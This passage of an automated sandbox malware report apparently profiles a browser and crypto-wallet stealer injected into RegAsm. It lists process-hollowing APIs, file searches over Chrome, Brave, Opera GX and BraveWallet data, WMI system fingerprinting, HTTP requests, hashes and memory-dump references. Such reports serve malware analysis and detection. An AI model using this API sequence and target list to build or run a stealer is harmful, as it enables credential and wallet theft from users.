LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418E5C
GetProcAddress.KERNEL32(77040000), ref: 00418E77
GetProcAddress.KERNEL32 ref: 00418E8E
GetProcAddress.KERNEL32 ref: 00418EA5
GetProcAddress.KERNEL32 ref: 00418EBC
GetProcAddress.KERNEL32 ref: 00418ED3
GetProcAddress.KERNEL32(704D0000), ref: 00418EF2
GetProcAddress.KERNEL32 ref: 00418F09
GetProcAddress.KERNEL32 ref: 00418F20
GetProcAddress.KERNEL32 ref: 00418F37
GetProcAddress.KERNEL32 ref: 00418F4E
GetProcAddress.KERNEL32 ref: 00418F65
GetProcAddress.KERNEL32 ref: 00418F7C
GetProcAddress.KERNEL32 ref: 00418F93
GetProcAddress.KERNEL32(768D0000), ref: 00418FAE
GetProcAddress.KERNEL32 ref: 00418FC5
GetProcAddress.KERNEL32 ref: 00418FDC
GetProcAddress.KERNEL32 ref: 00418FF3
GetProcAddress.KERNEL32 ref: 0041900A
GetProcAddress.KERNEL32(75790000), ref: 00419029
GetProcAddress.KERNEL32 ref: 00419040
GetProcAddress.KERNEL32 ref: 00419057
GetProcAddress.KERNEL32 ref: 0041906E
GetProcAddress.KERNEL32 ref: 00419085
GetProcAddress.KERNEL32 ref: 0041909C
GetProcAddress.KERNEL32(75A10000), ref: 004190BB
GetProcAddress.KERNEL32 ref: 004190D2
GetProcAddress.KERNEL32 ref: 004190E9
GetProcAddress.KERNEL32 ref: 00419100
GetProcAddress.KERNEL32 ref: 00419117
GetProcAddress.KERNEL32 ref: 0041912E
GetProcAddress.KERNEL32 ref: 00419145
GetProcAddress.KERNEL32 ref: 0041915C
GetProcAddress.KERNEL32 ref: 00419173
GetProcAddress.KERNEL32(76850000), ref: 0041918E
GetProcAddress.KERNEL32 ref: 004191A5
GetProcAddress.KERNEL32 ref: 004191BC
GetProcAddress.KERNEL32 ref: 004191D3
GetProcAddress.KERNEL32 ref: 004191EA
GetProcAddress.KERNEL32(75690000), ref: 00419205
GetProcAddress.KERNEL32 ref: 0041921C
GetProcAddress.KERNEL32(769C0000), ref: 00419237
GetProcAddress.KERNEL32 ref: 0041924E
GetProcAddress.KERNEL32(6FAE0000), ref: 0041926D
GetProcAddress.KERNEL32 ref: 00419284
GetProcAddress.KERNEL32 ref: 0041929B
GetProcAddress.KERNEL32 ref: 004192B2
GetProcAddress.KERNEL32 ref: 004192C9
GetProcAddress.KERNEL32 ref: 004192E0
GetProcAddress.KERNEL32 ref: 004192F7
GetProcAddress.KERNEL32 ref: 0041930E
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00419324
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 0041933A
GetProcAddress.KERNEL32(75D90000), ref: 00419355
GetProcAddress.KERNEL32 ref: 0041936C
GetProcAddress.KERNEL32 ref: 00419383
GetProcAddress.KERNEL32 ref: 0041939A
GetProcAddress.KERNEL32(76470000), ref: 004193B5
GetProcAddress.KERNEL32(6CE40000), ref: 004193D0
GetProcAddress.KERNEL32 ref: 004193E7
GetProcAddress.KERNEL32 ref: 004193FE
GetProcAddress.KERNEL32 ref: 00419415
GetProcAddress.KERNEL32(6CC50000,SymMatchString), ref: 0041942F

Strings

HttpQueryInfoA, xrefs: 00419314
VirtualAllocEx, xrefs: 00418D72
InternetSetOptionA, xrefs: 0041932A
SetThreadContext, xrefs: 00418DB4
GetThreadContext, xrefs: 00418D46
CreateProcessA, xrefs: 00418D30
WriteProcessMemory, xrefs: 00418D9E
ResumeThread, xrefs: 00418D88
dbghelp.dll, xrefs: 00418E52
ReadProcessMemory, xrefs: 00418D5C
SymMatchString, xrefs: 00419429

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
API String ID: 2238633743-2740034357
Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19

Function 00414CC8 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 297
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00414D1C
FindFirstFileA.KERNEL32(?,?), ref: 00414D33
_memset.LIBCMT ref: 00414D4F
_memset.LIBCMT ref: 00414D60
StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
wsprintfA.USER32 ref: 00414DC2
StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
wsprintfA.USER32 ref: 00414DFF
wsprintfA.USER32 ref: 00414E16

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181

_memset.LIBCMT ref: 00414E28
lstrcatA.KERNEL32(?,?), ref: 00414E3D
strtok_s.MSVCRT ref: 00414E82
_memset.LIBCMT ref: 00414E94
lstrcatA.KERNEL32(?,?), ref: 00414EA9
strtok_s.MSVCRT ref: 00414EC2
PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
strtok_s.MSVCRT ref: 00414FE7
FindNextFileA.KERNELBASE(?,?), ref: 00415105
FindClose.KERNEL32(?), ref: 00415125

Strings

%s\%s, xrefs: 00414DBC
%s\%s\%s, xrefs: 00414DF9
%s\%s, xrefs: 00414E10
%s\*.*, xrefs: 00414D10

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memsetlstrcatwsprintf$FileFindlstrcpystrtok_s$CloseCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 2867719434-332874205
Opcode ID: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
Opcode Fuzzy Hash: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55

Function 0040884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E

CopyFileA.KERNEL32(?,?,00000001,004371C4,004367CF,?,?,?), ref: 00408941

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
lstrlenA.KERNEL32(?), ref: 00408CF0
lstrlenA.KERNEL32(?), ref: 00408D0B

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

DeleteFileA.KERNEL32(?), ref: 00408D4E

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00408B8F

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
String ID: ERROR_RUN_EXTRACTOR
API String ID: 2819533921-2709115261
Opcode ID: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
Instruction ID: 65d458a2be874082b650ad6ccfc12f730853009eff9118d7dbcfdf0fd3eb137e
Opcode Fuzzy Hash: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
Instruction Fuzzy Hash: CAE14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98

Function 00409D1C Relevance: 40.9, APIs: 18, Strings: 5, Instructions: 610
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
StrCmpCA.SHLWAPI(?), ref: 0040A1FC
StrCmpCA.SHLWAPI(?), ref: 0040A266
StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

StrCmpCA.SHLWAPI(?), ref: 0040A35C
CopyFileA.KERNEL32(?,?,00000001,0043738C,004367FB), ref: 0040A41C
StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
DeleteFileA.KERNEL32(?), ref: 0040A522

Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF

Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B

StrCmpCA.SHLWAPI(?), ref: 0040A553
CopyFileA.KERNEL32(?,?,00000001,004373A0,00436802), ref: 0040A613
DeleteFileA.KERNEL32(?), ref: 0040A6AA

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

FindNextFileA.KERNEL32(?,?), ref: 0040A76E
FindClose.KERNEL32(?), ref: 0040A782

Strings

Google Chrome, xrefs: 0040A4B9
Preferences, xrefs: 0040A023
\BraveWallet\Preferences, xrefs: 0040A105
Brave, xrefs: 0040A00D
Opera GX, xrefs: 00409E8B

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpylstrlen$Find$CopyDeletelstrcat$CloseFirstNextSystemTime
String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 3650549319-1189830961
Opcode ID: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
Instruction ID: a20a882fd3e2cf19c19de5c34085d4fd9f009afcaba82f6ce1c70ae1e393a276
Opcode Fuzzy Hash: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
Instruction Fuzzy Hash: 7D422A3194012D9BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB79AED98F89

Function 00415FD1 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 205stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00416018
FindFirstFileA.KERNEL32(?,?), ref: 0041602F
StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
wsprintfA.USER32 ref: 00416091
StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
wsprintfA.USER32 ref: 004160C2
wsprintfA.USER32 ref: 004160D9
PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
lstrcatA.KERNEL32(?), ref: 00416125
lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
lstrcatA.KERNEL32(?,?), ref: 0041614A
lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
lstrcatA.KERNEL32(?,?), ref: 00416170
FindNextFileA.KERNEL32(?,?), ref: 004162FF
FindClose.KERNEL32(?), ref: 00416313

Strings

%s\%s, xrefs: 004160D3
%s\*, xrefs: 0041600C
%s\%s, xrefs: 0041608B

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$File$CloseFirstMatchNextPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 3541214880-445461498
Opcode ID: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
Instruction ID: e3980370ac94f341e4db787ecefa849356652b5b9a50b55dc8137c0c02bcad1e
Opcode Fuzzy Hash: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
Instruction Fuzzy Hash: FC81277190022DABCF60EF61CC45ACD77B9FB08305F0194EAE549A3150EE39AA898F94

Function 00411807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0041180E
CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1

FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
HeapAlloc.KERNEL32(00000000), ref: 0041191D
VariantClear.OLEAUT32(?), ref: 0041195C
wsprintfA.USER32 ref: 00411949

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

%d/%d/%d %d:%d:%d, xrefs: 00411943
Unknown, xrefs: 00411971
WQL, xrefs: 0041189A
Unknown, xrefs: 0041196A
InstallDate, xrefs: 004118ED
Select * From Win32_OperatingSystem, xrefs: 00411895
Unknown, xrefs: 00411985
ROOT\CIMV2, xrefs: 00411862

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2280294774-461178377
Opcode ID: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
Instruction ID: 9b83a2dca4a1b3c6c0afd6b9e082c19a49acb0dc1fc89349d09b2b61b6485616
Opcode Fuzzy Hash: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
Instruction Fuzzy Hash: F7418D71940209BBCB20CBD5DC89EEFBBBDEFC9B11F20411AF611A6190D7799941CB28

Function 00406963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
StrCmpCA.SHLWAPI(?), ref: 004069DF
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
InternetCloseHandle.WININET(?), ref: 00406B50
InternetCloseHandle.WININET(?), ref: 00406B5C
InternetCloseHandle.WININET(?), ref: 00406B68

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Strings

ERROR, xrefs: 00406BAB
GET, xrefs: 00406A42
ERROR, xrefs: 00406AB6

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
